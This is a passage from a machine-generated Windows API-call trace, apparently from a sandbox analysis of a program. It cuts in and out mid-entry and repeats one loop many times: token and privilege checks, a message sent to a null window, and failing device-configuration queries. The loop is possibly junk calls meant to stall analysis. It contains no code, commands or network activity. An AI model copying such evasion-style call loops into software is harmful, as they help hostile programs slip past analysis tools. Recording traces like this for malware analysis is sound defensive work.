(hProcess=0x0) returned 0x0 [0085.045] GetCurrentThread () returned 0xfffffffe [0085.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.045] GetLastError () returned 0x3f0 [0085.045] GetCurrentProcess () returned 0xffffffff [0085.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.045] SetLastError (dwErrCode=0x522) [0085.045] CloseHandle (hObject=0x114) returned 1 [0085.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.046] GetLastError () returned 0x578 [0085.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.046] GetCurrentThread () returned 0xfffffffe [0085.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.046] GetLastError () returned 0x3f0 [0085.046] GetCurrentProcess () returned 0xffffffff [0085.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.046] SetLastError (dwErrCode=0x522) [0085.046] CloseHandle (hObject=0x114) returned 1 [0085.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.046] GetLastError () returned 0x578 [0085.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.046] GetCurrentThread () returned 0xfffffffe [0085.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.046] GetLastError () returned 0x3f0 [0085.046] GetCurrentProcess () returned 0xffffffff [0085.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.046] SetLastError (dwErrCode=0x522) [0085.046] CloseHandle (hObject=0x114) returned 1 [0085.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.046] GetLastError () returned 0x578 [0085.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.046] GetCurrentThread () returned 0xfffffffe [0085.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.046] GetLastError () returned 0x3f0 [0085.046] GetCurrentProcess () returned 0xffffffff [0085.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.046] SetLastError (dwErrCode=0x522) [0085.046] CloseHandle (hObject=0x114) returned 1 [0085.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.046] GetLastError () returned 0x578 [0085.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.046] GetCurrentThread () returned 0xfffffffe [0085.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.047] GetLastError () returned 0x3f0 [0085.047] GetCurrentProcess () returned 0xffffffff [0085.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.047] SetLastError (dwErrCode=0x522) [0085.047] CloseHandle (hObject=0x114) returned 1 [0085.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.047] GetLastError () returned 0x578 [0085.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.047] GetCurrentThread () returned 0xfffffffe [0085.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.047] GetLastError () returned 0x3f0 [0085.047] GetCurrentProcess () returned 0xffffffff [0085.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.047] SetLastError (dwErrCode=0x522) [0085.047] CloseHandle (hObject=0x114) returned 1 [0085.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.047] GetLastError () returned 0x578 [0085.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.047] GetCurrentThread () returned 0xfffffffe [0085.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.047] GetLastError () returned 0x3f0 [0085.047] GetCurrentProcess () returned 0xffffffff [0085.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.047] SetLastError (dwErrCode=0x522) [0085.047] CloseHandle (hObject=0x114) returned 1 [0085.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.047] GetLastError () returned 0x578 [0085.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.047] GetCurrentThread () returned 0xfffffffe [0085.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.047] GetLastError () returned 0x3f0 [0085.047] GetCurrentProcess () returned 0xffffffff [0085.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.047] SetLastError (dwErrCode=0x522) [0085.047] CloseHandle (hObject=0x114) returned 1 [0085.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.047] GetLastError () returned 0x578 [0085.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.048] GetCurrentThread () returned 0xfffffffe [0085.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.048] GetLastError () returned 0x3f0 [0085.048] GetCurrentProcess () returned 0xffffffff [0085.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.048] SetLastError (dwErrCode=0x522) [0085.048] CloseHandle (hObject=0x114) returned 1 [0085.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.048] GetLastError () returned 0x578 [0085.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.048] GetCurrentThread () returned 0xfffffffe [0085.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.048] GetLastError () returned 0x3f0 [0085.048] GetCurrentProcess () returned 0xffffffff [0085.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.048] SetLastError (dwErrCode=0x522) [0085.048] CloseHandle (hObject=0x114) returned 1 [0085.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.048] GetLastError () returned 0x578 [0085.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.048] GetCurrentThread () returned 0xfffffffe [0085.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.048] GetLastError () returned 0x3f0 [0085.048] GetCurrentProcess () returned 0xffffffff [0085.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.048] SetLastError (dwErrCode=0x522) [0085.048] CloseHandle (hObject=0x114) returned 1 [0085.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.048] GetLastError () returned 0x578 [0085.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.048] GetCurrentThread () returned 0xfffffffe [0085.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.048] GetLastError () returned 0x3f0 [0085.048] GetCurrentProcess () returned 0xffffffff [0085.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.048] SetLastError (dwErrCode=0x522) [0085.049] CloseHandle (hObject=0x114) returned 1 [0085.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.049] GetLastError () returned 0x578 [0085.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.049] GetCurrentThread () returned 0xfffffffe [0085.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.049] GetLastError () returned 0x3f0 [0085.049] GetCurrentProcess () returned 0xffffffff [0085.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.049] SetLastError (dwErrCode=0x522) [0085.049] CloseHandle (hObject=0x114) returned 1 [0085.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.049] GetLastError () returned 0x578 [0085.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.049] GetCurrentThread () returned 0xfffffffe [0085.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.049] GetLastError () returned 0x3f0 [0085.049] GetCurrentProcess () returned 0xffffffff [0085.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.049] SetLastError (dwErrCode=0x522) [0085.049] CloseHandle (hObject=0x114) returned 1 [0085.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.049] GetLastError () returned 0x578 [0085.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.049] GetCurrentThread () returned 0xfffffffe [0085.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.049] GetLastError () returned 0x3f0 [0085.049] GetCurrentProcess () returned 0xffffffff [0085.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.049] SetLastError (dwErrCode=0x522) [0085.049] CloseHandle (hObject=0x114) returned 1 [0085.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.049] GetLastError () returned 0x578 [0085.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.049] GetCurrentThread () returned 0xfffffffe [0085.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.049] GetLastError () returned 0x3f0 [0085.049] GetCurrentProcess () returned 0xffffffff [0085.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.050] SetLastError (dwErrCode=0x522) [0085.050] CloseHandle (hObject=0x114) returned 1 [0085.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.050] GetLastError () returned 0x578 [0085.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.050] GetCurrentThread () returned 0xfffffffe [0085.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.050] GetLastError () returned 0x3f0 [0085.050] GetCurrentProcess () returned 0xffffffff [0085.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.050] SetLastError (dwErrCode=0x522) [0085.050] CloseHandle (hObject=0x114) returned 1 [0085.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.050] GetLastError () returned 0x578 [0085.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.050] GetCurrentThread () returned 0xfffffffe [0085.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.050] GetLastError () returned 0x3f0 [0085.050] GetCurrentProcess () returned 0xffffffff [0085.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.050] SetLastError (dwErrCode=0x522) [0085.050] CloseHandle (hObject=0x114) returned 1 [0085.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.050] GetLastError () returned 0x578 [0085.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.050] GetCurrentThread () returned 0xfffffffe [0085.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.050] GetLastError () returned 0x3f0 [0085.050] GetCurrentProcess () returned 0xffffffff [0085.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.050] SetLastError (dwErrCode=0x522) [0085.050] CloseHandle (hObject=0x114) returned 1 [0085.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.050] GetLastError () returned 0x578 [0085.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.051] GetCurrentThread () returned 0xfffffffe [0085.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.051] GetLastError () returned 0x3f0 [0085.051] GetCurrentProcess () returned 0xffffffff [0085.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.051] SetLastError (dwErrCode=0x522) [0085.051] CloseHandle (hObject=0x114) returned 1 [0085.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.051] GetLastError () returned 0x578 [0085.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.051] GetCurrentThread () returned 0xfffffffe [0085.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.051] GetLastError () returned 0x3f0 [0085.051] GetCurrentProcess () returned 0xffffffff [0085.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.051] SetLastError (dwErrCode=0x522) [0085.051] CloseHandle (hObject=0x114) returned 1 [0085.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.051] GetLastError () returned 0x578 [0085.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.051] GetCurrentThread () returned 0xfffffffe [0085.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.051] GetLastError () returned 0x3f0 [0085.051] GetCurrentProcess () returned 0xffffffff [0085.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.051] SetLastError (dwErrCode=0x522) [0085.051] CloseHandle (hObject=0x114) returned 1 [0085.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.051] GetLastError () returned 0x578 [0085.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 